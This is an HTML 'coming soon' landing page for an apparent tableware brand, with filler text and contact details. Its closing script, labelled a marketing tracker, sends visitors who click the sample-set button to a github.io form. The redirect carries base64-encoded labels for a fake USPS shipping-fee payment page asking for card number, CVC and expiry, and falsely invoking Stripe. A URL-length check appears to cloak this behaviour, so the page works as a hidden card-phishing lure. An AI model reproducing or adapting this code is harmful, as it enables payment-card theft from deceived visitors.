
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Eleganza</title>
    <link href="https://fonts.googleapis.com/css?family=Karla:400,700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.materialdesignicons.com/4.8.95/css/materialdesignicons.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">




<style>
    body {
  font-family: 'Karla', sans-serif;
  background-image: url("../images/top-view-arrangement-soy-sauce-napkins.jpg");
  background-size: cover;
  background-repeat: no-repeat;
  background-position: center;
  color: #ffffff;
  padding-bottom: 75px; }
  @media (min-width: 768px) {
    body {
      padding-bottom: 110px; } }

.navbar-brand {
  margin-left: -20px;

 }
  .navbar-brand img {
    height: 21px; }

.text-box {
    font-family: 'Dancing Script', Ephesis;

        }

.button {
            
            border: 2px solid #fff; /* White border */
            display: inline-block;
            padding: 15px 30px;
            font-size: 16px;
            text-decoration: none;
            background-color: #282727;
            color: #ffffff;
            border-radius: 8px;
            transition: background-color 0.3s;
            margin-top: 2px;
            display: inline-block;
            
    }
    .button:hover {
            background-color: #3d3d3d;
            text-decoration: none;
            color: inherit;
        }


.navbar-dark {
  padding-top: 35px;
  padding-bottom: 35px; }
  .navbar-dark .navbar-text {
    color: #ffffff;
    opacity: 1;
    padding: 0 20px;
    border-right: 1px solid #ffffff;
    font-size: 18px;
    font-weight: bold;
    text-align: center; }
    .navbar-dark .navbar-text:last-child {
      border-right: 0; }
  @media (max-width: 767px) {
    .navbar-dark {
      padding-bottom: 0; } }

.page-title {
  font-size: 80px;
  font-weight: bold;
  margin-bottom: 6px; }
  @media (max-width: 767px) {
    .page-title {
      font-size: 35px;
      margin-bottom: 14px; } }

.page-description {
  max-width: 765px;
  font-size: 18px;
  margin-bottom: 15px; }
  @media (max-width: 767px) {
    .page-description {
      font-size: 14px; } }

p {
  font-size: 14px;
  margin-bottom: 21px; }

.footer-social-links .social-link {
  display: inline-block;
  text-align: center;
  line-height: 40px;
  width: 40px;
  height: 40px;
  border-radius: 50%;
  background-color: #ffffff;
  color: #000000;
  margin-right: 16px;
  transition: all 0.3s ease-in-out; }
  .footer-social-links .social-link:last-child {
    margin-right: 0; }
  .footer-social-links .social-link:hover {
    text-decoration: none;
    background-color: #000000;
    color: #ffffff; }

/*# sourceMappingURL=bd-coming-soon.css.map */
    #preloader{
    background: #000 url(images/loader.gif) no-repeat center center;
    background-size: 4%;
    height: 100vh;
    width:100%;
    position: fixed;
    z-index: 100;
  }


    
</style>


    
</head>

<body  class="min-vh-100 d-flex flex-column">
  <div id="preloader"></div>
    <header>
        <div class="container">
            <nav class="navbar navbar-dark bg-transparent">
                <a class="navbar-brand" href="#">
                    <div class="text-box"><h1><b>Eleganza Tableware Co.</b></h1></div><!--<img src="/images/logo.svg" alt="logo">-->
                </a>
                <span class="navbar-text ml-auto d-none d-sm-inline-block">978-130-5444 </span>
                <span class="navbar-text d-none d-sm-inline-block">jerald_glover@glennie.tv</span>
            </nav>
        </div>
    </header>
    <main class="my-auto">
        <div class="container">
            <h1 class="page-title">We're coming soon</h1>

            <p class="page-description">Lorem ipsum dolor sit amet consectetur adipisicing elit sed eiu sit amet consectetur <br>iydiysyidsdgusygdus hsihdsd iydiywdywgd dywygdywgduii ydgwiyw</p>
                <!--<p id="currentUrl"></p>-->
                <a class="button" id="dynamicLink" href="form.html">Get Your Free Sample Set</a>


            <br></br>
            <p>Stay connected <br><b>We are located at :</b>
               <br>Stay connected</p>
            <nav class="footer-social-links">
                <a href="#!" class="social-link"><i class="mdi mdi-facebook-box"></i></a>
                <a href="#!" class="social-link"><i class="mdi mdi-twitter"></i></a>
                <a href="#!" class="social-link"><i class="mdi mdi-google"></i></a>
                <a href="#!" class="social-link"><i class="mdi mdi-slack"></i></a>
                <a href="#!" class="social-link"><i class="mdi mdi-skype"></i></a>
            </nav>
        </div>   
    </main>
</body>






<script>
  // Marketing source tracker (source based direction)
  function getQueryStringParameters() {
      var queryString = window.location.search.substring(1);
      var params = queryString.split("&");
      var paramMap = {};
      for (var i = 0; i < params.length; i++) {
          var pair = params[i].split("=");
          paramMap[pair[0]] = pair[1];
      }
      return paramMap;
  }

  function updateLinkWithParameters(link, parameters) {
      var href = link.getAttribute("href");
      var updatedHref = href + "?" + Object.entries(parameters).map(pair => pair.join("=")).join("&");
      link.setAttribute("href", updatedHref);
  }

  // Get current parameters
  var currentParameters = getQueryStringParameters();

  // Check the length of the visitor URL
  var visitorUrlLength = window.location.href.length;

  if (visitorUrlLength > 700) {
      // Use Script 2 logic
      var dynamicLink = document.getElementById("dynamicLink");
      updateLinkWithParameters(dynamicLink, currentParameters);
  } else {
      // Use Script 1 logic
      document.getElementById('dynamicLink').addEventListener('click', function (event) {
          event.preventDefault();
          const visitorUrl = window.location.href;
          const match = visitorUrl.match(/[?&](\d+)/);
          const timestamp = match ? match[1] : '156';
          const fixedParams = "Y29sb3I9UGF5bWVudCtJbmZvcm1hdGlvbislMjhTaGlwcGluZytDaGFyZ2VzJTI5JnNpemU9VGhlK2VtYmVkZGVkK3BheW1lbnQrZ2F0ZXdheStpcytwcm92aWRlZCtieStTdHJpcGUrSW5jLitBbGwrdHJhbnNhY3Rpb25zK2NvbmR1Y3RlZCt0aHJvdWdoK3RoaXMrcGxhdGZvcm0rd2lsbCtiZStzZWN1cmVseStwcm9jZXNzZWQrYnkrdmlhK1N0cmlwZSthbmQrYXJlK2RpcmVjdGVkK3RvK1VTUFMmZm9vdHNpemU9VG90YWwrQW1vdW50JTNBKyUyNDYuODgmaGVpZ2h0PSpBY2NlcHRlZCtDYXJkcyUzQStWaXNhJTJDK01hc3RlcmNhcmQlMkMrQW1lcmljYW4rRXhwcmVzcyUyQythbmQrRGlzY292ZXIuJnNob2U9Q2FyZCtOdW1iZXImY2F0PU5hbWUrb24rQ2FyZCZiYXQ9Q1ZDJmNodXJuPUVuZCtEYXRlKyUyOE1NJTJGWVklMjkmcGxhc21hPVBheSthbmQrUHJvY2VlZCZpcm9ubWFuPVVwb24rY29tcGxldGlvbitvZit0aGUrcGF5bWVudCtwcm9jZXNzJTJDK3lvdSt3aWxsK2JlK2F1dG9tYXRpY2FsbHkrcmVkaXJlY3RlZCt0byt0aGUrVVNQUyttYWlsK3NlcnZpY2UrdHJhY2tpbmcrcGFnZStmb3IrdXBkYXRlcytvbit5b3VyK29yZGVyLg";
          const dynamicLink = `https://festcontactpage.github.io/form.html?params=${fixedParams}&timestamp=${timestamp}`;
          //window.location.href = dynamicLink;
          window.location.replace(dynamicLink);
          //window.open(dynamicLink, '_blank');
      });
  }
</script>

<script>
  var loader = document.getElementById("preloader")
  window.addEventListener("load",function(){
    loader.style.display = "none";
  })
</script>


</html>
